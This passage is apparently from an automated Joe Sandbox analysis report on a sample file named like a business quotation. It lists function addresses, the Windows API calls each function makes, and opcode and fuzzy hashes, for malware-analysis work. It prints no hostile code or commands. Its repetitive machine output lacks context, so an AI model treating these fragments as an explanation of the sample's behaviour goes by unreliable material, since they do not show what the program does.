                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                      • String ID:
                                                                                      • API String ID: 1352324309-0
                                                                                      • Opcode ID: e0d782357d96183525a9970bf71ad673c62f5da785eb7c7dd8b19098ab955b4d
                                                                                      • Instruction ID: 9d8086fe413ae227ab718cfb27d500ed43ed01ce1fa985791dede7bef7940d57
                                                                                      • Opcode Fuzzy Hash: e0d782357d96183525a9970bf71ad673c62f5da785eb7c7dd8b19098ab955b4d
                                                                                      • Instruction Fuzzy Hash: 1011C0B1209360EFE720AF14EC08FA37FFCEB00B00F108569A616DA591D7B0E954DBA1
                                                                                      Function 0012B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0012ACD3,?,00008000), ref: 0012B0C4
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0012ACD3,?,00008000), ref: 0012B0E9
                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0012ACD3,?,00008000), ref: 0012B0F3
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0012ACD3,?,00008000), ref: 0012B126
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                      • String ID:
                                                                                      • API String ID: 2875609808-0
                                                                                      • Opcode ID: 127bae2073eef5212a4aec2389173524c9b03542aa48fa38a4bda71aba130080
                                                                                      • Instruction ID: 8b604d23a39c10258e0c71522f56c6206ee31d21a667480fc0f9c3630310d499
                                                                                      • Opcode Fuzzy Hash: 127bae2073eef5212a4aec2389173524c9b03542aa48fa38a4bda71aba130080
                                                                                      • Instruction Fuzzy Hash: 0E113C71C05A39DBCF04AFA4F9A86EEBB78FF09711F114085D941B6141CB3056608B95
                                                                                      Function 00157E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(?,?), ref: 00157E33
                                                                                      • ScreenToClient.USER32(?,?), ref: 00157E4B
                                                                                      • ScreenToClient.USER32(?,?), ref: 00157E6F
                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00157E8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 357397906-0
                                                                                      • Opcode ID: 47c7042000d0ff6a0e89fa9e5e34e3cefcc10b5a25749bbaf7112c66411c214f
                                                                                      • Instruction ID: 20b76d947c6cba400b91e069236fd0eb6c71874a52d5f973648dc3b81018dc83
                                                                                      • Opcode Fuzzy Hash: 47c7042000d0ff6a0e89fa9e5e34e3cefcc10b5a25749bbaf7112c66411c214f
                                                                                      • Instruction Fuzzy Hash: 151163B9D0024AEFDB41CF98C8859EEBBF5FB08311F104056E911E6610D734AA94CF90
                                                                                      Function 000E01F8 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(0019070C,?,?,000D8747,00192514), ref: 000E0202
                                                                                      • LeaveCriticalSection.KERNEL32(0019070C,?,000D8747,00192514), ref: 000E0235
                                                                                      • SetEvent.KERNEL32(00000000,00192514), ref: 000E02C3
                                                                                      • ResetEvent.KERNEL32 ref: 000E02CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalEventSection$EnterLeaveReset
                                                                                      • String ID:
                                                                                      • API String ID: 3553466030-0
                                                                                      • Opcode ID: aabf99638b5ead2e3d1be7808205fcc78ce850c079887468be1c7ee0ea2b492e
                                                                                      • Instruction ID: b9ed6c3a0d77ddf0254ac204dc34c14a10544dd2220b43e3678838073ed0a2f8
                                                                                      • Opcode Fuzzy Hash: aabf99638b5ead2e3d1be7808205fcc78ce850c079887468be1c7ee0ea2b492e
                                                                                      • Instruction Fuzzy Hash: 3C011639A01320DFCB099F98FD4895977E5EB497A1B01002AFA429BB20CB706D80CFE4
                                                                                      Function 00122DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00122DC5
                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00122DD6
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00122DDD
                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00122DE4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2710830443-0
                                                                                      • Opcode ID: fe62b11faf6eebfd1ff1998d2e3d8a3bbba2f1127e531f70895fa90fb17243ff
                                                                                      • Instruction ID: 5380fb42fb313400a98b59ace4d83c881a7bb8eea34c155c187364d76db16aaa
                                                                                      • Opcode Fuzzy Hash: fe62b11faf6eebfd1ff1998d2e3d8a3bbba2f1127e531f70895fa90fb17243ff
                                                                                      • Instruction Fuzzy Hash: 50E06D72101338BBD7201BB2AC0DEEB3E6CEB42BA2F000015F105D95809AA48980C6F0
                                                                                      Function 00158863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000D9693
                                                                                        • Part of subcall function 000D9639: SelectObject.GDI32(?,00000000), ref: 000D96A2
                                                                                        • Part of subcall function 000D9639: BeginPath.GDI32(?), ref: 000D96B9
                                                                                        • Part of subcall function 000D9639: SelectObject.GDI32(?,00000000), ref: 000D96E2
                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00158887
                                                                                      • LineTo.GDI32(?,?,?), ref: 00158894
                                                                                      • EndPath.GDI32(?), ref: 001588A4
                                                                                      • StrokePath.GDI32(?), ref: 001588B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                      • String ID:
                                                                                      • API String ID: 1539411459-0
                                                                                      • Opcode ID: b162f5da58bd7644744c4d41e9fe985549d364f8696e15ff2416bd6e9d59aca3
                                                                                      • Instruction ID: 6545be7ec4a0f443d010cb5797108fecc51821cead222d374c7e470d1698f754
                                                                                      • Opcode Fuzzy Hash: b162f5da58bd7644744c4d41e9fe985549d364f8696e15ff2416bd6e9d59aca3
                                                                                      • Instruction Fuzzy Hash: 7DF05E3A041359FEDB126F94AC09FCE3F59AF06312F048001FA21694E2C7755591CFE5
                                                                                      Function 000E0A9D Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000E0AAF
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000E0ABE
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 000E0AC7
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 000E0AD4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: d44b09179d414c14993d4d12f9aeed63f70c722546a19ad929b46fb82f321eed
                                                                                      • Instruction ID: c507130b1bc8665dffe7918d6510589fa850c586a329be5d3f02867887d632e1
                                                                                      • Opcode Fuzzy Hash: d44b09179d414c14993d4d12f9aeed63f70c722546a19ad929b46fb82f321eed
                                                                                      • Instruction Fuzzy Hash: 93F04D71C1030DEFCB00DFB4D989A9EBBF8FF18206F518896A412EA550D674AB44DB91
                                                                                      Function 000D98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000008), ref: 000D98CC
                                                                                      • SetTextColor.GDI32(?,?), ref: 000D98D6
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 000D98E9
                                                                                      • GetStockObject.GDI32(00000005), ref: 000D98F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$ModeObjectStockText
                                                                                      • String ID:
                                                                                      • API String ID: 4037423528-0
                                                                                      • Opcode ID: 39645783c03668560f5a75dd4a5b5b7dfed226c259317220db9cef907625adf1
                                                                                      • Instruction ID: baa82235b9ca9b3b9af8662e25601c4e15d631cbe32a8aa3b1eb3dad159c1b06
                                                                                      • Opcode Fuzzy Hash: 39645783c03668560f5a75dd4a5b5b7dfed226c259317220db9cef907625adf1
                                                                                      • Instruction Fuzzy Hash: 6CE06D31244780EEDB215F78AC09BE83F61AB52336F04822AF6FA585E1C77146809B21
                                                                                      Function 0012162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentThread.KERNEL32 ref: 00121634
                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,001211D9), ref: 0012163B
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001211D9), ref: 00121648
                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,001211D9), ref: 0012164F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                      • String ID:
                                                                                      • API String ID: 3974789173-0
                                                                                      • Opcode ID: fe09611abc96e9289b93defb5327a4392ac0b843650aa8afca744ecf548353d7
                                                                                      • Instruction ID: 17a9d7aa1a0c289c449be4845a2e8ace485ab1f83db82fc57ea32d14d129dadf
                                                                                      • Opcode Fuzzy Hash: fe09611abc96e9289b93defb5327a4392ac0b843650aa8afca744ecf548353d7
                                                                                      • Instruction Fuzzy Hash: EFE04F75602321EFD7601FA0AD0DB4B3B68AF54B92F144808F245CD080D7644480C790
                                                                                      Function 0011D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 0011D858
                                                                                      • GetDC.USER32(00000000), ref: 0011D862
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0011D882
                                                                                      • ReleaseDC.USER32(?), ref: 0011D8A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      • Opcode ID: 39e853c2837c7551c4b2944be67eb4dec6ca6df04b817a8b29fc40e3a0af8d8d
                                                                                      • Instruction ID: 9a3924759927e36a0dca458ba588ee91214ebe4874df88ef21ea076839b43e28
                                                                                      • Opcode Fuzzy Hash: 39e853c2837c7551c4b2944be67eb4dec6ca6df04b817a8b29fc40e3a0af8d8d
                                                                                      • Instruction Fuzzy Hash: 62E01AB4800304DFCF419FA0D808A6DBBB1FB08312F108019F80AEB750C7384A82EF90
                                                                                      Function 0011D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 0011D86C
                                                                                      • GetDC.USER32(00000000), ref: 0011D876
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0011D882
                                                                                      • ReleaseDC.USER32(?), ref: 0011D8A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      • Opcode ID: 3a953013b4ff34061b98cfb0fe1c8679e0148057d477d9d6b51dfc50a572b53c
                                                                                      • Instruction ID: 08a75bbb2edbfb1cc04651fac4bcf8c057427ab7c7a0fbd6f2482ec3e94e6f0e
                                                                                      • Opcode Fuzzy Hash: 3a953013b4ff34061b98cfb0fe1c8679e0148057d477d9d6b51dfc50a572b53c
                                                                                      • Instruction Fuzzy Hash: BBE09A75800304DFCF519FA0D808A6DBBB5FB48712B148459F94AEB750C7385A42EF90
                                                                                      Function 0013910C Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 383COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 001394E5
                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00139585
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileName$OpenSave
                                                                                      • String ID: X
                                                                                      • API String ID: 3924019920-3081909835
                                                                                      • Opcode ID: 9b65c6254333cd56f3d15b8982bbe96752d149b53435fb28e30a46fac2db2524
                                                                                      • Instruction ID: 0547a395e86a7e0e2b814b578077bf1b9d020eb49b106e16dfb5cd973466fecb
                                                                                      • Opcode Fuzzy Hash: 9b65c6254333cd56f3d15b8982bbe96752d149b53435fb28e30a46fac2db2524
                                                                                      • Instruction Fuzzy Hash: E3E16B716083409FD724EF24C885BAEB7E4BF85314F04896DF8899B2A2DB71DD45CB92
                                                                                      Function 00134D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00134ED4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Connection
                                                                                      • String ID: *$LPT
                                                                                      • API String ID: 1722446006-3443410124
                                                                                      • Opcode ID: 7039f87ec9b09b12817fa8916fc8713e988cb94a82325b3350d608bfc14dd945
                                                                                      • Instruction ID: 24ebeaa50edb660d248db61a0ccb75f3532bc65f69eb284c82933b61b7ac9c2f
                                                                                      • Opcode Fuzzy Hash: 7039f87ec9b09b12817fa8916fc8713e988cb94a82325b3350d608bfc14dd945
                                                                                      • Instruction Fuzzy Hash: CD916C75A002049FCB14DF58C484EAEBBF5BF49304F198099E84A9F3A2C775EE85CB90
                                                                                      Function 000DE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      • Opcode ID: 8187b00142ad664cfc25e8b2d44445ed6cfc520d7e5d66ade6b121dfa12f4fbb
                                                                                      • Instruction ID: 5ef1341e69ab29ea2f6c44a2419b71fb2108e780664abfd71c634dfaa6df2d66
                                                                                      • Opcode Fuzzy Hash: 8187b00142ad664cfc25e8b2d44445ed6cfc520d7e5d66ade6b121dfa12f4fbb
                                                                                      • Instruction Fuzzy Hash: D351E1359043869EEB19EFA8C481AFE7BE4EF55310F64406AEC519B2D1D7309D82CBA0
                                                                                      Function 000DF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(00000000), ref: 000DF2A2
                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 000DF2BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                      • String ID: @
                                                                                      • API String ID: 2783356886-2766056989
                                                                                      • Opcode ID: 808a3428b67e5f424018dd9b21b56acb24ea369a41d4380c15a7adf652f861f4
                                                                                      • Instruction ID: 8ff3cce9c03feabd3c2b0badf5a327817842ebd4fe15aff87daa0fc1813827ce
                                                                                      • Opcode Fuzzy Hash: 808a3428b67e5f424018dd9b21b56acb24ea369a41d4380c15a7adf652f861f4
                                                                                      • Instruction Fuzzy Hash: 75513771408744ABE320AF14DC86BAFBBF8FB84300F81885DF1D941196EB718569CB67
                                                                                      Function 000E3F4A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?), ref: 000E3F6E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: EncodePointer
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 2118026453-2084237596
                                                                                      • Opcode ID: a6a1b7a9ed70cd41065b703479082daf4fc7a852ef305658c0f2bb7f78382cbb
                                                                                      • Instruction ID: e64d459648aefd9e6d18cd5cca39bbc12b79a35d6d318419297b0a72c6c0e836
                                                                                      • Opcode Fuzzy Hash: a6a1b7a9ed70cd41065b703479082daf4fc7a852ef305658c0f2bb7f78382cbb
                                                                                      • Instruction Fuzzy Hash: 08317A7190028AAFDF11DF55C885AADBBB5FF48304F1981A9FA1477252C338EE50CB61
                                                                                      Function 0015356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00153621
